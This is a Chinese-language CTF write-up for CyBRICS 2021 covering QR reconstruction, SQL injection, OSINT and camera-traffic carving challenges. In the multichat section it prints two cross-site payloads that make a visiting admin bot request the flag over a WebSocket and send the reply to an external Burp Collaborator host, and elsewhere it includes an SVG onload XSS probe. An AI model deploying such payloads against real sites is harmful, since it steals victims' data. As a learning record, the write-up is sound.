CyBBICS CTF
本次比赛算是做出了四个题 (俩题是合作的 第二天一题也没做出 吐血
什么时候才能变强(期待。。。
scanner
写个脚本跑出二维码 再ps一下 就能扫(我脚本跑出来的不是正方形。。。
from PIL import Image ,ImageSequence
# im = Image.open("vid.gif")
# # print(im.size) (1080, 1080)
# index = 1
# for frame in ImageSequence.Iterator(im):
# frame = frame.convert("RGB")
# frame.save("hack/kill{}.png".format(index))
# index += 1
points = []
index = 20
def search(png):
for x in range(0,1080):
for y in range(0,1080):
# print(png.getpixel((x, y)))
if png.getpixel((x, y)) == (0, 0, 0):
points.append((x, y-index*21))
# im = Image.open("hack/kill9.png")
# search(im)
# print(points)
# 496 - 517 之间 的图像给截取出来? 21
for i in range(1,146):
index -= 1
print(index)
im = Image.open("hack/kill{}.png".format(i))
search(im)
pic = Image.new('1',(1080,3200),255)
for poin in points:
pic.putpixel(poin,0)
pic.save("hack/example.png")
announcement
貌似只有一个发送邮件的api
看看有没有什么更多的信息?
POST一个东西 有啥用?
digest=311003a76495b5a4207add1e272c755f&email=q2313%40qq.com
貌似一个对应的 Email 会生成 一个对应的 digest
所以?如果我们能找到规律 是不是就能改下 email的值来搞点事情?
感觉这题是个xss?
构造
<svg/onload=alert(xss)>
在其中实现xss
<div class="fw-bolder">Form submission successful! We will contact you by the email 16032658@qq.com in three days (before July 27).</div>
结果是个注入题 简单写个脚本跑出flag
cybrics{1N53r7_0ld_900d_5ql}
CAPTCHA The Flag
Guessing challenges? On my CyBRICS? It’s more likely than you think.
Prove you’re a true CTFer!
纯手工 重复25次拿到flag 累死我了。。。
multichat
发消息是属实搞 。。。
真的就给条消息。。。
cookie有没有什么可以利用的点?无
发现管理员会与我们给的url交互
在自己的vps挂钓鱼网站
csrf
没打通
<script>
var ws = new WebSocket('ws://multichat-cybrics2021.ctf.su/ws');
ws.onopen = function() {
ws.send("Hey, i forgot the flag. Can you remind me?");
};
ws.onmessage = function(event) {
fetch('https://von3nc1ll1rvwvn4tqnub7o7kyqoed.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>
比赛后问学长 改句话即可
<script>
var ws = new WebSocket('ws://multichat-cybrics2021.ctf.su/ws');
ws.onopen = function() {
ws.send("Hey, i forgot the flag. Can you remind me?");
};
ws.onmessage = function(event) {
new Image().src="https://von3nc1ll1rvwvn4tqnub7o7kyqoed.burpcollaborator.net"+event.data;
};
</script>
Signer
直接给了py文件 看一下
吐血 做不出来
checkname
我们从犯罪分子的计算机上获得了主文件夹。尝试找到他/她的真实姓名。
.bash_history
git add *
git commit -m "instagram filter"
git push origin main
rm *
ls -la
rm -rf .git
.profile
# ~/.profile: executed by Bourne-compatible login shells.
if [ "$BASH" ]; then
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
fi
mesg n 2> /dev/null || true
.bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
#if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
# . /etc/bash_completion
#fi
profile与bashrc都是Shell的启动设置档,角色类似Microsoft
DOS/Windows下的autoexec.bat文件,以下就是这二种文件自己个别的文字叙述。
或许从该黑客的个人习惯下手?
比如 alias?
# If this is an xterm set the title to user@host:dir
尝试搜寻 vividcoala无果 做不动了
复现
instagram 是一款社交软件(没听说过 吐血
搜到此账户 有一张机票 名没有给二维码打码
然后对二维码进行分析
可以得出 此人的真实姓名
lx100
什么是 lx100?
一款摄像机
随便扔条请求到谷歌上搜索
GET /cam.cgi?mode=camcmd&value=recmode HTTP/1.1
搜到一个github仓库 https://github.com/cleverfox/lumixproto
里面是关于接口的信息
找到传视频的接口
发现以 UDP 格式传输
直接筛选出所有的 UDP 包包
把数据导出来
用010 Editor 打开后 搜索 FF D8 和 FF D9
发现搜索到了455个 图片
写脚本将 455 个图片均提取出来?
from binascii import *
datas = []
with open("seek.txt","r") as s:
d = s.readlines()
for i in d:
i = i[:-2]
# print(i.encode())
datas.append(int(i.encode(),16))
# datas.append(b2a_hex(i.encode()))
#
file = open("fu","rb")
index = 0
for i in range(len(datas)):
head = datas[i]
file.seek(int(head))
data = file.read()
index += 1
with open("photo/{}.jpg".format(index),"wb") as jpg:
jpg.write(data)
结束了。。。
收获:
- 学会了收集相关信息(以前都是直接上去摁看 啥都不会也摁看
- 学会了处理数据 (导出 , 定位 ,写脚本提取文件 。。。
- 搞明白了图片中地址的信息